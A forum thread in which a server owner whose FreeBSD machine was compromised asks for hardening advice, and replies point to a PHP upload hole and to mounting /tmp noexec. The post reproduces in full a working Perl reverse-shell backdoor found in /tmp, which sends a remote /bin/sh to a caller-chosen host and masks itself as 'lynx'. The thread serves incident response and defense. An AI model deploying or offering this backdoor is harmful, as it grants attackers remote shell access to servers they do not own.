how I can security hardening services my server hacked

adamp

Verified User
Joined
Jan 11, 2007
Messages
141
I have server and all my server is hucked sites and root

I reset the pass of admin & root

I find this script in /tmp called "back" which was a script to open up a backdoor to grant someone root access.
This is the scripts contents:

#!/usr/bin/perl
use Socket;
$cmd= "lynx";
$system= 'echo "`uname -a`";echo "`id`";/bin/sh';
$0=$cmd;
$target=$ARGV[0];
$port=$ARGV[1];
$iaddr=inet_aton($target) || die("Error: $!\n");
$paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");
$proto=getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(SOCKET, $paddr) || die("Error: $!\n");
open(STDIN, ">&SOCKET");
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
system($system);
close(STDIN);
close(STDOUT);
close(STDERR);

I've deleted the script.
The script was chowned to apache:wheel, meaning a hole in apache was the way he got in.

someone tell me that i need security hardening services

he say this:

Based on the fact your system is freebsd 4.10, and that apache is compiled with OpenSSL/0.9.7d .. which is quite old, that's probably why.

what I need to do help me

thank you
 
Its probably not apache itself but a php script running on the server somewhere that allowed the file to be uploaded.
 
/tmp should mounted with nosuid,noexec and chmod 1777

While that is a good idea it will not prevent someone from using the perl command in front of the script. For instance in this case the perl script was called "back." Someone can still run the script like:
Code:
perl /tmp/back
 
Back
Top